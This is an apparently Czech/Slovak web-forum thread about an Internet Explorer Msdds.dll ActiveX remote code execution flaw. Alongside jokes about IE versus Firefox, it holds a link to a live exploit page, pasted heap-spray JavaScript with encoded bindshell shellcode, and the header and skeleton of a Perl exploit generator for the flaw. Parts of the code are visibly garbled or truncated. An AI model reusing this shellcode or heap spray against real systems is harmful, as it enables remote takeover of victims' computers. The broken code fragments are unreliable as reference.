Nová bezpečnostní chyba postihující Internet Explorer

Čauki lidi,
Dnes jsem se setkal se zajimavým problémem.Po zapnutí počítače se mi z ničeho nic otočil obraz na monitoru vzhůru nohama.Jsem přesvedčen,že za to může nějaký laškovný virus.Můžete ni někdo poradit co s tím?

Čauki lidi,
Dnes jsem se setkal se zajimavým problémem.Po zapnutí počítače se mi z ničeho nic otočil obraz na monitoru vzhůru nohama. Můžete ni někdo poradit co s tím?

http://hannes.wz.cz/ie.php

Prosím o odstranění toho trapnýho odkazu, než na něj nějaký chudák klikne.

Uz jsem klikl, nod 32 zaprskal a nepustil...

jak na nej muze kliknout kdyz ten odkaz neni klikaci

hmm skusil jsem ten web a napsalo to akorat helou:) nic to neshodilo mam naistalovanej MS Office 2003 (jak pisou) a skusil jsem to jak v IE tak v opere... ach jo :(

To je hezký, jaks to udělal? Mně to dokonce vyvolalo OOM killera a zabilo firefoxe!! To musím mít!! :D

shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0 178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1 ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66e b%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031 %u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c% u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%u ffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7 d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55 a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccf e%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031 %u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56% uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u 41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5 353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u53 4b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u504 8%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0 %ufec2%uffff%uc483%u615c%u89eb");
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.lengthfillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;


Staci stahnout a otevrit v notepadu...

Klik jsem na to, bylo tam napsáno helou a nic...to má něco dělat?

Noo,ak chcete aby vam ta chyba isla tak musite mat tu kniznicu Msdds.dll ,a aj to nie hocijaku.,,Ziskate ju " ak si nainstalujete:Microsoft Visual Studio .NET, Microsoft Visio Professional 2002, ATI Catalyst Driver atd http://www.securityfocus.com/bid/14594/info .

tato chyba je uz niekolko dni stara a napriek tomu vela antivirakov nieje schopna detekovat tento exploit,
myslim ze na opravu od M$ si este pockame,tak ludia updatnite si antiviraky

zabudol som - cize ak msdds.dll nemate na disku mozete spokojne spat

Jednoduché řešení - Firefox!!!!!!!

jj já to taky říkám pořád

Hele takže v čem je chyba ? V IE anebo v ActiveX objektu ?

Chyba je v M$ ze nedokazi vyresit problem zvany ActiveX

... no to jsem se toho zase dozvěděl...

ActiveX preci neni problem, ale feature..

Myslím, že ActiveX není feature, ale problem.

Stejne by me zajimalo, kdyz ma M$ take problemy o kterych vedi ze za to vse muze ActiveX, proz ho stale pouzivaj. No FireFox ci Opera s tiim problem nemaji

Oslnivá logika. Řek bych že Notepad s tím taky problém mít nebude.

aby ses ještě nedivil

Chybu udelali imho soudruzi z MS uz v dobe kdy ActiveX do msie vubec zaradili. Chyba je to na strane ActiveX ale MSIE tuto "technologii" (nebo spise uz hackovaci software ?) pouziva a tvuj system tak bude napadan nejcasteji skrze MSIE. Zlom vaz !

Nojo ale pak zase nebudou fungovat cool vychytávky které se dají pomocí ActiveX dělat.

jj, třeba skvělé internetové bankovnictví KB ...

Jako treba hacknout svemu dvanactiletemu kamosovi jeho PC?

Kdo jsou to "imho soudruzi"? Nejsi ty jezevec?

"...zakázat Internet Exploreru používat zranitelný ActiveX "
Mám pocit, že užívatelia MS IE jeden týždeň active X vypnú - vždy keď sa nájde nejaká chyba, a druhý týždeň - po oprave a stiahnutí záplat - si ho zapnú naspäť
a tak stále dookola

preto je to ActiveX, aby boli uzivatelia aktivni a zapinali a vypinali ))

Pak by ovsem meli pozmenit logo. To X by melo vypadat jako cervene tlaciko

Kdyz se ve Firefoxu objevi "chybka" typu "podobne vypadaji pismena", tak je to kriticka chyba.
Kdyz se v IE objevi dira jak vrata, kterou muze kdokoli remote pouzit, tak je to jen nova bezpecnostni chyba.

Logicka dedukce: v IE je tech der jak vrata tolik, ze to uz ani nema smysl oznacovat jako kritickou chybu, zato ve Firefoxu je problem najit zavaznejsi chybu a proto se za kritickou oznaci kazda blbost.

Ty už to taky nehul.

no neco na tom je

chtěl bych mít váš nadhled
a umět takhle snadno porovnávat webový prohlížeč s operačním systémem

Co tu tahate operacni system?!!!!! Chyba se tyka weboveho prohlizece!

chtěl bych mít váš nadhled
a umět takhle snadno porovnávat webový prohlížeč s operačním systémem

Tak ten nikdy mit nebudes

a je mi dobre a nic mi nechybi.

Taky pridam jednoduchy postup a navod
http://www.frsirt.com/bulletins/1789
Taky jste aspon ze slusnosti mohli uvest odkaz na FrSIRT ktery tu chybu nalez a je tam popsana.
Jinak bych rekl ze ten kod uvolnily velmi stastne pod GPL licencí.

#!/usr/bin/perl
##################################################### ##
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
########################################################
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#################################################### ###

# header
my $header = "\n\n";

# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';

# footer
my $footer = "\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";